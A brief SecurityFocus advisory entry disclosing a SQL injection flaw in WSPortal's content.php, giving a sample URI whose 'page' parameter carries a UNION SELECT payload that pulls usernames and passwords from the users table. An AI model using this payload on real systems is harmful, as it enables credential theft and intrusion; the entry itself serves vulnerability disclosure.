WSPortal Content.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

A sample URI has been provided:

http://www.example.com/[WSPORTAL-DIRECTORY]/content.php?page=0' UNION SELECT `username`,`password` FROM `users` WHERE '1


 

Privacy Statement
Copyright 2010, SecurityFocus